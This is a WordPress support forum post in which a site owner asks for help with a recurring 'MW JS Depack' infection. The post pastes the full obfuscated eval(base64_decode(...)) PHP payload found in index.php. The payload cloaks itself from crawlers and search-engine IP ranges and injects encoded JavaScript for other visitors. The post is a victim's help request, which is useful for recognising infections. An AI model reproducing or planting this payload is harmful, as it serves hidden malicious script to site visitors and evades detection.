Support » Fixing WordPress » My site is hacked with MW JS Depack?

  • Hello,..
    Everytime I open my website, my antivirus shows a warning. Then I check my site through http://sitecheck.sucuri.net/, it says that my website is infected with MW JS Depack.

    I check my installation, I found this in index.php (in all domain root) :

    eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlkZXInLCdjcmF3bCcsJ3ZhbGlkYXRvcicsJ3NsdXJwJywnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW5rLmNvbScsJ2h0bWxkb2MnLCd3ZWJjb2xsYWdlJywnYmxvZ3B1bHNlLmNvbScsJ2Fub255bW91c2Uub3JnJywnMTIzNDUnLCdodHRwY2xpZW50JywnYnV6enRyYWNrZXIuY29tJywnc25vb3B5JywnZmVlZHRvb2xzJywnYXJpYW5uYS5saWJlcm8uaXQnLCdpbnRlcm5ldHNlZXIuY29tJywnb3BlbmFjb29uLmRlJywncnJycnJycnJyJywnbWFnZW50JywnZG93bmxvYWQgbWFzdGVyJywnZHJ1cGFsLm9yZycsJ3ZsYyBtZWRpYSBwbGF5ZXInLCd2dnJraW1zanV3bHkgbDN1Zm1qcngnLCdzem4taW1hZ2UtcmVzaXplcicsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ3dvcmRwcmVzcycsJ3Jzc3JlYWRlcicsJ215YmxvZ2xvZyBhcGknKTsNCiRzdG9wX2lwc19tYXNrcyA9IGFycmF5KA0KCWFycmF5KCIyMTYuMjM5LjMyLjAiLCIyMTYuMjM5LjYzLjI1NSIpLA0KCWFycmF5KCI2NC42OC44MC4wIiAgLCI2NC42OC44Ny4yNTUiICApLA0KCWFycmF5KCI2Ni4xMDIuMC4wIiwgICI2Ni4xMDIuMTUuMjU1IiksDQoJYXJyYXkoIjY0LjIzMy4xNjAuMCIsIjY0LjIzMy4xOTEuMjU1IiksDQoJYXJyYXkoIjY2LjI0OS42NC4wIiwgIjY2LjI0OS45NS4yNTUiKSwNCglhcnJheSgiNzIuMTQuMTkyLjAiLCAiNzIuMTQuMjU1LjI1NSIpLA0KCWFycmF5KCIyMDkuODUuMTI4LjAiLCIyMDkuODUuMjU1LjI1NSIpLA0KCWFycmF5KCIxOTguMTA4LjEwMC4xOTIiLCIxOTguMTA4LjEwMC4yMDciKSwNCglhcnJheSgiMTczLjE5NC4wLjAiLCIxNzMuMTk0LjI1NS4yNTUiKSwNCglhcnJheSgiMjE2LjMzLjIyOS4xNDQiLCIyMTYuMzMuMjI5LjE1MSIpLA0KCWFycmF5KCIyMTYuMzMuMjI5LjE2MCIsIjIxNi4zMy4yMjkuMTY3IiksDQoJYXJyYXkoIjIwOS4xODUuMTA4LjEyOCIsIjIwOS4xODUuMTA4LjI1NSIpLA0KCWFycmF5KCIyMTYuMTA5Ljc1LjgwIiwiMjE2LjEwOS43NS45NSIpLA0KCWFycmF5KCI2NC42OC44OC4wIiwiNjQuNjguOTUuMjU1IiksDQoJYXJyYXkoIjY0LjY4LjY0LjY0IiwiNjQuNjguNjQuMTI3IiksDQoJYXJyYXkoIjY0LjQxLjIyMS4xOTIiLCI2NC40MS4yMjEuMjA3IiksDQoJYXJyYXkoIjc0LjEyNS4wLjAiLCI3NC4xMjUuMjU1LjI1NSIpLA0KCWFycmF5KCI2NS41Mi4wLjAiLCI2NS41NS4yNTUuMjU1IiksDQoJYXJyYXkoIjc0LjYuMC4wIiwiNzQuNi4yNTUuMjU1IiksDQoJYXJyYXkoIjY3LjE5NS4wLjAiLCI2Ny4xOTUuMjU1LjI1NSIpLA0KCWFycmF5KCI3Mi4zMC4wLjAiLCI3Mi4zMC4yNTUuMjU1IiksDQoJYXJyYXkoIjM4LjAuMC4wIiwiMzguMjU1LjI1NS4yNTUiKQ0KCSk7DQokbXlfaXAybG9uZyA9IHNwcmludGYoIiV1IixpcDJsb25nKCRfU0VSVkVSWydSRU1PVEVfQUREUiddKSk7DQpmb3JlYWNoICggJHN0b3BfaXBzX21hc2tzIGFzICRJUHMgKSB7DQoJJGZpcnN0X2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1swXSkpOyAkc2Vjb25kX2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1sxXSkpOw0KCWlmICgkbXlfaXAybG9uZyA+PSAkZmlyc3RfZCAmJiAkbXlfaXAybG9uZyA8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQ0KfQ0KZm9yZWFjaCAoJHVzZXJfYWdlbnRfdG9fZmlsdGVyIGFzICRib3Rfc2lnbil7DQoJaWYgIChzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IHRydWU7IGJyZWFrO30NCn0NCmlmICghJGJvdCkgew0KZWNobyBiYXNlNjRfZGVjb2RlKCJQSE5qY21sd2RENWxkbUZzS0daMWJtTjBhVzl1S0hBc1lTeGpMR3NzWlN4a0tYdGxQV1oxYm1OMGFXOXVLR01wZTNKbGRIVnliaWhqUEdFL0p5YzZaU2h3WVhKelpVbHVkQ2hqTDJFcEtTa3JLQ2hqUFdNbFlTaytNelUvVTNSeWFXNW5MbVp5YjIxRGFHRnlRMjlrWlNoakt6STVLVHBqTG5SdlUzUnlhVzVuS0RNMktTbDlPMmxtS0NFbkp5NXlaWEJzWVdObEtDOWVMeXhUZEhKcGJtY3BLWHQzYUdsc1pTaGpMUzBwZTJSYlpTaGpLVjA5YTF0alhYeDhaU2hqS1gxclBWdG1kVzVqZEdsdmJpaGxLWHR5WlhSMWNtNGdaRnRsWFgxZE8yVTlablZ1WTNScGIyNG9LWHR5WlhSMWNtNG5YRngzS3lkOU8yTTlNWDA3ZDJocGJHVW9ZeTB0S1h0cFppaHJXMk5kS1h0d1BYQXVjbVZ3YkdGalpTaHVaWGNnVW1WblJYaHdLQ2RjWEdJbksyVW9ZeWtySjF4Y1lpY3NKMmNuS1N4clcyTmRLWDE5Y21WMGRYSnVJSEI5S0NkeUlHNG9OU2w3TXlCaVBWd25kMXduT3pNZ1l6MW9JR1VvS1R0cktETWdhVDB3TzJrOGVEdHBLeXNwZTJOYllpNW1LR2srUGpRcEsySXVaaWhwSm5VcFhUMTBMbkVvYVNsOU5pZ2hOUzV6S0M5ZVcyRXRkaTA1WFNva0wya3BLVzhnZVRzMktEVXVaeVV5S1RVOVhDY3dYQ2NyTlRzeklHdzlOUzVuT3pNZ056MW9JR1VvS1RzeklHbzlNRHRyS0RNZ2FUMHdPMms4YkR0cEt6MHlLWHMzVzJvcksxMDlZMXMxTGtFb2FTd3lLVjE5YnlBM0xub29YQ2RjSnlsOU5pZzRMbTB1UXloY0ozQTlaRnduS1QwOUxURXBlemd1UWlodUtGd25SRnduS1NrN09DNXRQVnduY0Qxa1hDZDlKeXcwTUN3ME1Dd25mSHg4ZG1GeWZIeGtZWFJoZkdsbWZISmxjM1ZzZEh4a2IyTjFiV1Z1ZEh4OGZHSXhObDlrYVdkcGRITjhZakUyWDIxaGNIeGxibUZpYkdWa2ZFRnljbUY1ZkdOb1lYSkJkSHhzWlc1bmRHaDhibVYzZkh4OFptOXlmR3hzZkdOdmIydHBaWHhvUkdOa2ZISmxkSFZ5Ym54amIyOXJhV1ZvZkdaeWIyMURhR0Z5UTI5a1pYeG1kVzVqZEdsdmJueHRZWFJqYUh4VGRISnBibWQ4TVRWOFpqQjhNREV5TXpRMU5qYzRPV0ZpWTJSbFpud3lOVFo4Wm1Gc2MyVjhhbTlwYm54emRXSnpkSEo4ZDNKcGRHVjhhVzVrWlhoUFpud3pZelkwTmprM05qSXdOek0zTkRjNU5tTTJOVE5rTWpJM01EWm1Oek0yT1RjME5qazJaalpsTTJFeU1EWXhOakkzTXpabU5tTTNOVGMwTmpVellqSXdObU0yTlRZMk56UXpZVEl3TW1Rek1UTTVNemt6TXpjd056Z3pZakl3TnpRMlpqY3dNMkV5TURKa016SXpPVE01TXpFM01EYzRNMkl5TWpObE0yTTJPVFkyTnpJMk1UWmtOalV5TURjM05qazJORGMwTmpnelpESXlNelF6TURJeU1qQTJPRFkxTmprMk56WTROelF6WkRJeU16SXpNREl5TWpBM016Y3lOak16WkRJeU5qZzNORGMwTnpBellUSm1NbVkyTmpjMk5qVTNZVFkzTm1FM05qSmxOMkUzT1RabE56TXlaVFl6Tm1ZMlpESm1ObVEyTVRZNU5tVXlaVGN3TmpnM01ETm1OekEyTVRZM05qVXpaRFl6TXpZek9UWXlOalF6TURNeU5qVXpPVE16TmpVek5qTTVNelV6TnpZek1qSXpaVE5qTW1ZMk9UWTJOekkyTVRaa05qVXpaVE5qTW1ZMk5EWTVOell6WlNjdWMzQnNhWFFvSjN3bktTd3dMSHQ5S1NrOEwzTmpjbWx3ZEQ0PSIpOw0KfQ=='));

    I cleaned all of them, but they are keep coming, and infect my index.php file.
    I check a post by victorciobanu: http://www.victorciobanu.com/how-to-remove-mwjsdepack/ but I think this is different, because I don’t see any problem with wp-settings.php

    I also has removed my wordpress installation, and re-install it, but the malware keeps coming.

    I hope someone have a solution for this.

    Thank you…

Viewing 6 replies - 1 through 6 (of 6 total)
Viewing 6 replies - 1 through 6 (of 6 total)
  • The topic ‘My site is hacked with MW JS Depack?’ is closed to new replies.